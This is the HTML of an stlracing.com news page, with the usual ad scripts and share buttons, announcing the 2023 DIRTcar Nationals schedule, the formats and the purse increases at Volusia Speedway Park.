AdButler.ads.push({handler: function(opt){ AdButler.register(165890, 313963, [728,90], 'placement_313963_'+opt.place, opt); }, opt: { place: plc313963++, keywords: abkw, domain: 'servedbyadbutler.com', click:'CLICK_MACRO_PLACEHOLDER' }});
</script></div></div></div></div></div></div></div>                    </div>
                                <div class="td-header-desktop-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none">
                    <div id="tdi_46" class="tdc-zone"><div class="tdc_zone tdi_47  wpb_row td-pb-row" data-sticky-offset="0" >
<style scoped>

/* custom css */
.tdi_47{
                    min-height: 0;
                }.td-header-desktop-sticky-wrap.td-header-active{
                    opacity: 1;
                }
</style><div id="tdi_48" class="tdc-row"><div class="vc_row tdi_49  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_49,
                .tdi_49 .tdc-columns{
                    min-height: 0;
                }.tdi_49,
				.tdi_49 .tdc-columns{
				    display: block;
				}.tdi_49 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_51  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_51{
                    vertical-align: baseline;
                }.tdi_51 > .wpb_wrapper,
				.tdi_51 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_51 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_51 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_51 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"></div></div></div></div></div></div>                </div>
            </div>
            
    <div class="td-main-content-wrap td-container-wrap">

        <div class="td-container td-post-template-default ">
            <div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="https://www.stlracing.com/">Home</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="View all posts in Dirt Late Model News" class="entry-crumb" href="https://www.stlracing.com/category/dirt-late-model-news/">Dirt Late Model News</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience</span></div></div>

            <div class="td-pb-row">
                                        <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-72666" class="post-72666 post type-post status-publish format-standard has-post-thumbnail category-dirt-late-model-news category-florida-2 category-open-wheel-modified-news category-sprint-car-news category-u-m-p-dirtcar-series-news-open-wheel-modified-news category-volusia-speedway-park-florida-2 category-world-of-outlaws-late-model-series-news category-world-of-outlaws-sprint-car-series-news category-xtreme-outlaw-series tag-all-star-circuit-of-champions tag-dirtcar tag-dirtcar-nationals tag-dirtcar-ump tag-late-model tag-late-models tag-modified tag-modifieds tag-schedule tag-sprint-cars tag-sprints tag-sunshine-nationals tag-ump tag-ump-modifieds tag-usa tag-usac tag-volusia-speedway-park" itemscope itemtype="https://schema.org/Article">
        <div class="td-post-header">

            <!-- category --><ul class="td-category"><li class="entry-category"><a  href="https://www.stlracing.com/category/dirt-late-model-news/">Dirt Late Model News</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/race-track-news/">Race Track News</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/race-track-news/florida-2/">Florida</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/open-wheel-modified-news/">Open Wheel Modified News</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/sprint-car-news/">Sprint Car &amp; Midget News</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/open-wheel-modified-news/u-m-p-dirtcar-series-news-open-wheel-modified-news/">U.M.P. DIRTcar Series Modified News</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/race-track-news/florida-2/volusia-speedway-park-florida-2/">Volusia Speedway Park</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/dirt-late-model-news/world-of-outlaws-late-model-series-news/">World of Outlaws Late Model Series News</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/sprint-car-news/world-of-outlaws-sprint-car-series-news/">World of Outlaws Sprint Car Series News</a></li><li class="entry-category"><a  href="https://www.stlracing.com/category/sprint-car-news/xtreme-outlaw-series/">Xtreme Outlaw Series</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience</h1>
                

                <div class="td-module-meta-info">
                    <!-- author -->                    <!-- date --><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-29T13:21:58-06:00" >November 29, 2022</time></span>                    <!-- comments -->                    <!-- views -->                </div>

            </header>

        </div>

        <div class="td-post-sharing-top"><div class="td-post-sharing-classic"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:auto; height:21px; background-color:transparent;"></iframe></div><div id="td_social_sharing_article_top" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 ">
		<style>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</style>

		<div class="td-post-sharing-visible"><div class="td-social-sharing-button td-social-sharing-button-js td-social-handler td-social-share-text">
                                        <div class="td-social-but-icon"><i class="td-icon-share"></i></div>
                                        <div class="td-social-but-text">Share</div>
                                    </div><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.stlracing.com%2F2022%2F11%2F29%2Fdirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience&url=https%3A%2F%2Fwww.stlracing.com%2F2022%2F11%2F29%2Fdirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience%2F&via=stlracing" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-reddit" href="https://reddit.com/submit?url=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&title=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience" title="ReddIt" ><div class="td-social-but-icon"><i class="td-icon-reddit"></i></div><div class="td-social-but-text">ReddIt</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&amp;media=https://www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg&description=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-tumblr" href="https://www.tumblr.com/share/link?url=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&name=DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience" title="Tumblr" ><div class="td-social-but-icon"><i class="td-icon-tumblr"></i></div><div class="td-social-but-text">Tumblr</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience %0A%0A https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" title="WhatsApp" ><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-mail" href="mailto:?subject=DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience&body=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" title="Email" ><div class="td-social-but-icon"><i class="td-icon-mail"></i></div><div class="td-social-but-text">Email</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-copy_url" href="https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" title="Copy URL" ><div class="td-social-but-icon"><div class="td-social-copy_url-check td-icon-check"></div><i class="td-icon-copy_url"></i></div><div class="td-social-but-text">Copy URL</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-print" href="#" title="Print" ><div class="td-social-but-icon"><i class="td-icon-print"></i></div><div class="td-social-but-text">Print</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_top" title="More">
                                    <div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
                                </a></div></div></div>
        <div class="td-post-content tagdiv-type">
            <!-- image -->
            <!-- content --><div class="td-a-rec td-a-rec-id-content_top  tdi_52 td_block_template_1">
<style>
/* custom css */
.tdi_52.td-a-rec{
					text-align: center;
				}.tdi_52 .td-element-style{
					z-index: -1;
				}.tdi_52.td-a-rec-img{
				    text-align: left;
				}.tdi_52.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_52.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><!-- STLRacing.com 728x90 [async] -->
<script type="text/javascript">if (!window.AdButler){(function(){var s = document.createElement("script"); s.async = true; s.type = "text/javascript";s.src = 'https://servedbyadbutler.com/app.js';var n = document.getElementsByTagName("script")[0]; n.parentNode.insertBefore(s, n);}());}</script>
<script type="text/javascript">
var AdButler = AdButler || {}; AdButler.ads = AdButler.ads || [];
var abkw = window.abkw || '';
var plc313963 = window.plc313963 || 0;
document.write('<'+'div id="placement_313963_'+plc313963+'"></'+'div>');
AdButler.ads.push({handler: function(opt){ AdButler.register(165890, 313963, [728,90], 'placement_313963_'+opt.place, opt); }, opt: { place: plc313963++, keywords: abkw, domain: 'servedbyadbutler.com', click:'CLICK_MACRO_PLACEHOLDER' }});
</script></div><p><img decoding="async" class="alignright size-medium wp-image-72667 jetpack-lazy-image" src="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=300%2C184&#038;ssl=1" alt width="300" height="184" data-recalc-dims="1" data-lazy-srcset="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=300%2C184&amp;ssl=1 300w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=1024%2C629&amp;ssl=1 1024w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=150%2C92&amp;ssl=1 150w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=768%2C472&amp;ssl=1 768w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=696%2C428&amp;ssl=1 696w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=1068%2C656&amp;ssl=1 1068w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=500%2C307&amp;ssl=1 500w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?w=1172&amp;ssl=1 1172w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=300%2C184&amp;is-pending-load=1#038;ssl=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-lazy-fallback="1" decoding="async" class="alignright size-medium wp-image-72667" src="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=300%2C184&#038;ssl=1" alt="" width="300" height="184" srcset="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=300%2C184&amp;ssl=1 300w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=1024%2C629&amp;ssl=1 1024w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=150%2C92&amp;ssl=1 150w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=768%2C472&amp;ssl=1 768w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=696%2C428&amp;ssl=1 696w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=1068%2C656&amp;ssl=1 1068w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?resize=500%2C307&amp;ssl=1 500w, https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?w=1172&amp;ssl=1 1172w" sizes="(max-width: 300px) 100vw, 300px" data-recalc-dims="1"  /></noscript><em><strong>World of Outlaws Sprint Cars and Late Models to contend for $20K to win in respective Saturday finales</strong></em></p>
<p>BARBERVILLE, FL (Nov. 29, 2022) – Entering the 52nd DIRTcar Nationals at Volusia Speedway Park, Feb. 6-18, fans and drivers will be treated to an enhanced schedule and several purse increases, including Saturday night World of Outlaws Sprint Car and Late Model Features paying $20,000 to win and $1,500 to start.</p>
<p>The two-week spectacle will feature the World of Outlaws NOS Energy Drink Sprint Car Series, DIRTcar UMP Modifieds and All Star Circuit of Champions during Week 1 (Feb. 6-11), and then the World of Outlaws CASE Construction Equipment Late Models, DIRTcar Late Models, Super DIRTcar Series and USAC Non-Wing Sprint Cars during Week 2 (Feb. 13-18).</p>
<p>New this year, you’ll see an adjusted schedule for the Late Models and Super DIRTcar Series, new formats for the DIRTcar UMP Modifieds and Super DIRTcar Series, the addition of USAC Non-Wing Sprint Cars and purse increases for the World of Outlaws Sprint Cars, World of Outlaws Late Models and Super DIRTcar Series.</p>
<p><em>WEEK 1 HIGHLIGHTS</em></p>
<p><strong>Sprint Cars (All Star Circuit of Champions, Feb. 7-8 / World of Outlaws, Feb. 9-11)</strong> – Sprint Cars will again highlight the first week of DIRTcar Nationals, but the World of Outlaws NOS Energy Drink Sprint Cars will see a special purse increase on Saturday, Feb. 11. This year, drivers will be competing for a $20,000 paycheck and a guaranteed $1,500 to start the final Feature of the week.</p>
<p>The All Star Circuit of Champions will kick off the week for the Sprints Tuesday and Wednesday, Feb. 6-7. Then, the World of Outlaws Sprint Cars will commence their 2023 season, Thursday through Saturday, Feb. 8-11. The overall Sprint Car Big Gator champion will also be crowned on Saturday.</p>
<p><strong>DIRTcar UMP Modifieds (Feb. 6-11)</strong> – The “Ironmen” of DIRTcar Nationals will see 30 Feature winners before Saturday’s Gator Championship finale this year.</p>
<p>Monday to Friday (Feb. 6-10) will have six DIRTcar UMP Modified Features a night. The $5,000-to-win finale on Saturday will be a normal program with Hot Laps, Qualifying, Heat Races and Last Chance Showdowns to fill out the 30-lap Gator Championship field. The week’s overall Big Gator champion for the division will also be crowned that night.</p>
<p><em>WEEK 2 HIGHLIGHTS</em></p>
<p><strong>Late Models (DIRTcar Late Models, Feb. 13-15 / World of Outlaws, Feb. 16-18)</strong> – The World of Outlaws CASE Construction Equipment Late Models will also see an increased Saturday (Feb. 18) purse paying $20,000 to win and $1,500 to start.</p>
<p>The DIRTcar Late Models will now race three nights, running Monday through Wednesday, Feb. 13-15. And on Wednesday, they’ll run Triple Features – the field split into three 25-lap races.</p>
<p>Then, the World of Outlaws CASE Late Models will take over for the rest of the week (Thursday to Saturday, Feb. 16-18) continuing their 2023 season that started at Volusia during <a href="https://link.mediaoutreach.meltwater.com/ls/click?upn=0v8KswDhF3ExXYyZxFnN-2FNC6k6g3plKQ56TsY3fOSUOwiugYHpxoLNzp52I-2BF2AoVWYhpsposWLutsjiQGU-2BNl5WLksBWJz3FSL6getR1cY-3DORqN_xOmeJsf3dY75q27VP8aFl906v6c8FMvt6jIx4XFBMM5xSILYOYsC7xggpBWdwJDtqtHVv-2FCMYrRd6RZ2rf6jnICFVi1Up5YMNC1pOpOWqUYOgarD2y-2FIlD1R7RCA03NwguV8-2BkT33mpcqYJu70bAh5oAHS4UmBfZpjJFzI1nq2cha-2FykXt-2FU0tLagTiTiuTphVKXwecsmuPkavO3e5qh-2Fbm5I4v7pyG5j26bZ1XCJB3eBgQrgSnGpCQCQSGPb2uDpXt5l0N5pXEWnh6rGfydc1tP2a8JaoRYC7GuPHTzrVcHYrn5mt4-2BeBy3LxTqujtGuSe-2Fln-2BljsLd3wXpCGVA27pkCU2n2obmLmqIwkcPBUxT0iPaO8Y2ERYBF0cdQKUiaw2F8JqafdvDJINhIJCIQw-3D-3D">Sunshine Nationals, Jan. 18-21</a>. The overall Late Model Big Gator champion will be crowned on Saturday, Feb. 18.</p>
<p><strong>Super DIRTcar Series (Feb. 15-18)</strong> – With four nights of racing this year, drivers will content for a larger overall purse. The Features Wednesday through Friday, Feb. 15-17, will pay $5,000 to win and Saturday’s (Feb. 18) Feature will pay $7,500 to win.</p>
<p>They’ll also see the testing of a new format for the four non-points events. Like the World of Outlaws, drivers will now draw for their qualifying order and their qualifying result will determine which Heat Race they’ll be in and where they’ll start. The top-two finishers from each Heat Race will go to the redraw.</p>
<p><strong>USAC Non-Wing Sprint Cars (Feb. 13-14)</strong> – Non-Wing Sprint Cars return to DIRTcar Nationals, again, making history with USAC’s event debut. Bringing the biggest names in Non-Wing Sprint Car racing to Barberville, FL, the Series will run Monday and Tuesday, Feb. 13-14, to help kick off the second week and crown the second-ever Non-Wing Sprint Car Big Gator champion Tuesday night.</p>
<p>Below is the schedule for the 52nd DIRTcar Nationals, Feb. 6-18:</p>
<table>
<tbody>
<tr>
<td width="204">Monday, Feb. 6</td>
<td width="420">DIRTcar UMP Modifieds / Sprint Car Hot Laps</td>
</tr>
<tr>
<td width="204">Tuesday, Feb. 7</td>
<td width="420">All Star Circuit of Champions / DIRTcar UMP Modifieds</td>
</tr>
<tr>
<td width="204">Wednesday, Feb. 8</td>
<td width="420">All Star Circuit of Champions / DIRTcar UMP Modifieds</td>
</tr>
<tr>
<td width="204">Thursday, Feb. 9</td>
<td width="420">World of Outlaws Sprint Cars / DIRTcar UMP Modifieds</td>
</tr>
<tr>
<td width="204">Friday, Feb. 10</td>
<td width="420">World of Outlaws Sprint Cars / DIRTcar UMP Modifieds</td>
</tr>
<tr>
<td width="204">Saturday, Feb. 11 (Championship Night)</td>
<td width="420">World of Outlaws Sprint Cars / DIRTcar UMP Modifieds</td>
</tr>
<tr>
<td width="204">Sunday, Feb. 12</td>
<td width="420">Off Day</td>
</tr>
<tr>
<td width="204">Monday, Feb. 13</td>
<td width="420">DIRTcar Late Models / USAC Non-Wing Sprint Cars</td>
</tr>
<tr>
<td width="204">Tuesday, Feb. 14</td>
<td width="420">DIRTcar Late Models / USAC Non-Wing Sprint Cars</td>
</tr>
<tr>
<td width="204">Wednesday, Feb. 15</td>
<td width="420">DIRTcar Late Models / Super DIRTcar Series</td>
</tr>
<tr>
<td width="204">Thursday, Feb. 16</td>
<td width="420">World of Outlaws Late Models / Super DIRTcar Series</td>
</tr>
<tr>
<td width="204">Friday, Feb. 17</td>
<td width="420">World of Outlaws Late Models / Super DIRTcar Series</td>
</tr>
<tr>
<td width="204">Saturday, Feb. 18 (Championship Night)</td>
<td width="420">World of Outlaws Late Models / Super DIRTcar Series</td>
</tr>
</tbody>
</table>
<p>For the full daily schedules, <a href="https://link.mediaoutreach.meltwater.com/ls/click?upn=0v8KswDhF3ExXYyZxFnN-2FNvLRRHxOTevHTNhtbHCgP6Lm4ARYSAh9l8TJMONqcuDorZ6_xOmeJsf3dY75q27VP8aFl906v6c8FMvt6jIx4XFBMM5xSILYOYsC7xggpBWdwJDtqtHVv-2FCMYrRd6RZ2rf6jnICFVi1Up5YMNC1pOpOWqUYOgarD2y-2FIlD1R7RCA03NwguV8-2BkT33mpcqYJu70bAh5oAHS4UmBfZpjJFzI1nq2cha-2FykXt-2FU0tLagTiTiuTphVKXwecsmuPkavO3e5qh-2FVQE5WGob-2BtHfL0p9ervN3ySlYR0VhocDw-2B9yUNaMpK3ttjkH5hsdvBrenz-2BPHXwEw-2B6MMfsnBpk54ckkQByN5t5PqwecxYqlU1Dq1UrdqO-2BKD4aaUXh9T-2BlF6nVd8CNCX7TRynrPHyKIGS1HWNUlx-2Fz9INd8Swb8ksP4kk6j2Aaxgirn0meoXG8O0MoVk9y0g-3D-3D">CLICK HERE</a>.</p>
<p>Gates are scheduled to open at 5pm (ET) every day. Tickets are now available at this link, <a href="https://link.mediaoutreach.meltwater.com/ls/click?upn=0v8KswDhF3ExXYyZxFnN-2FJhekVpos7cvNrUm1aCbhcE1GIhCTL1ZxgcGv-2FLaDL14qgLg_xOmeJsf3dY75q27VP8aFl906v6c8FMvt6jIx4XFBMM5xSILYOYsC7xggpBWdwJDtqtHVv-2FCMYrRd6RZ2rf6jnICFVi1Up5YMNC1pOpOWqUYOgarD2y-2FIlD1R7RCA03NwguV8-2BkT33mpcqYJu70bAh5oAHS4UmBfZpjJFzI1nq2cha-2FykXt-2FU0tLagTiTiuTphVKXwecsmuPkavO3e5qh-2FYyZONGEYzR3FKdL6b1HPIuSDDnFoZVlliEArRUXSHi4fEnqFg7U-2FOmUo29siNXZHgBxcZellMZzkp0-2FJ0w9Xh3PSPjkicE4PO10cjn31pbEKkLZR0I03rjRJ6YzVZs3q7CXVnYfoBcdaY2GJnSwKy0bYUb-2BbqHAKSotEyptpILVOT2G8RT-2FKKZ9SBVYQiaH1g-3D-3D">CLICK HERE</a></p>
<p>If you can’t make it to the track, you can watch all the action live on DIRTVision – either at <a href="https://link.mediaoutreach.meltwater.com/ls/click?upn=0v8KswDhF3ExXYyZxFnN-2FIUFV9MFQ7guObc-2BKlW-2Ft3DGaq6PPnxhDJ-2FxaHnG7gJCDrmu_xOmeJsf3dY75q27VP8aFl906v6c8FMvt6jIx4XFBMM5xSILYOYsC7xggpBWdwJDtqtHVv-2FCMYrRd6RZ2rf6jnICFVi1Up5YMNC1pOpOWqUYOgarD2y-2FIlD1R7RCA03NwguV8-2BkT33mpcqYJu70bAh5oAHS4UmBfZpjJFzI1nq2cha-2FykXt-2FU0tLagTiTiuTphVKXwecsmuPkavO3e5qh-2FRZsKO3SpOR75-2B3MUAJNv70icumI8WwxEjl0y9fAxdZ5Ob2bMux7cHe1jZ6hosgn6DkIpY9vqlQbu4tVYLbAZ50jeX1AnNsFR1AqsizaV4I7S54DS3Q5oJBx8SokCieb5SrA8ocoV4uU72quhmzgrSxHUF0bjpTl4HGAqeLwoXnejN8J9JZr8wmpJ4gMFs4aZg-3D-3D">DIRTVision.com or by downloading the DIRTVision App.</a></p>
<div class="td-a-rec td-a-rec-id-content_bottom  tdi_53 td_block_template_1">
<style>
/* custom css */
.tdi_53.td-a-rec{
					text-align: center;
				}.tdi_53 .td-element-style{
					z-index: -1;
				}.tdi_53.td-a-rec-img{
				    text-align: left;
				}.tdi_53.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_53.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><!-- STLRacing.com 728x90 [async] -->
<script type="text/javascript">if (!window.AdButler){(function(){var s = document.createElement("script"); s.async = true; s.type = "text/javascript";s.src = 'https://servedbyadbutler.com/app.js';var n = document.getElementsByTagName("script")[0]; n.parentNode.insertBefore(s, n);}());}</script>
<script type="text/javascript">
var AdButler = AdButler || {}; AdButler.ads = AdButler.ads || [];
var abkw = window.abkw || '';
var plc313963 = window.plc313963 || 0;
document.write('<'+'div id="placement_313963_'+plc313963+'"></'+'div>');
AdButler.ads.push({handler: function(opt){ AdButler.register(165890, 313963, [728,90], 'placement_313963_'+opt.place, opt); }, opt: { place: plc313963++, keywords: abkw, domain: 'servedbyadbutler.com', click:'CLICK_MACRO_PLACEHOLDER' }});
</script></div>        </div>

        <footer>
            <!-- post pagination -->            <!-- review -->
            <div class="td-post-source-tags">
                <!-- source via -->                <!-- tags --><ul class="td-tags td-post-small-box clearfix"><li><span>TAGS</span></li><li><a href="https://www.stlracing.com/tag/all-star-circuit-of-champions/">all star circuit of champions</a></li><li><a href="https://www.stlracing.com/tag/dirtcar/">dirtcar</a></li><li><a href="https://www.stlracing.com/tag/dirtcar-nationals/">dirtcar nationals</a></li><li><a href="https://www.stlracing.com/tag/dirtcar-ump/">dirtcar ump</a></li><li><a href="https://www.stlracing.com/tag/late-model/">late model</a></li><li><a href="https://www.stlracing.com/tag/late-models/">late models</a></li><li><a href="https://www.stlracing.com/tag/modified/">modified</a></li><li><a href="https://www.stlracing.com/tag/modifieds/">modifieds</a></li><li><a href="https://www.stlracing.com/tag/schedule/">schedule</a></li><li><a href="https://www.stlracing.com/tag/sprint-cars/">sprint cars</a></li><li><a href="https://www.stlracing.com/tag/sprints/">sprints</a></li><li><a href="https://www.stlracing.com/tag/sunshine-nationals/">sunshine nationals</a></li><li><a href="https://www.stlracing.com/tag/ump/">ump</a></li><li><a href="https://www.stlracing.com/tag/ump-modifieds/">ump modifieds</a></li><li><a href="https://www.stlracing.com/tag/usa/">usa</a></li><li><a href="https://www.stlracing.com/tag/usac/">usac</a></li><li><a href="https://www.stlracing.com/tag/volusia-speedway-park/">volusia speedway park</a></li></ul>            </div>

            <div class="td-post-sharing-bottom"><div class="td-post-sharing-classic"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:auto; height:21px; background-color:transparent;"></iframe></div><div id="td_social_sharing_article_bottom" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 "><div class="td-post-sharing-visible"><div class="td-social-sharing-button td-social-sharing-button-js td-social-handler td-social-share-text">
                                        <div class="td-social-but-icon"><i class="td-icon-share"></i></div>
                                        <div class="td-social-but-text">Share</div>
                                    </div><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.stlracing.com%2F2022%2F11%2F29%2Fdirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience&url=https%3A%2F%2Fwww.stlracing.com%2F2022%2F11%2F29%2Fdirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience%2F&via=stlracing" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-reddit" href="https://reddit.com/submit?url=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&title=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience" title="ReddIt" ><div class="td-social-but-icon"><i class="td-icon-reddit"></i></div><div class="td-social-but-text">ReddIt</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&amp;media=https://www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg&description=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-tumblr" href="https://www.tumblr.com/share/link?url=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/&name=DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience" title="Tumblr" ><div class="td-social-but-icon"><i class="td-icon-tumblr"></i></div><div class="td-social-but-text">Tumblr</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=DIRTcar+Nationals+Makes+Schedule+Updates+to+Enhance+Driver%2C+Fan+Experience %0A%0A https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" title="WhatsApp" ><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-mail" 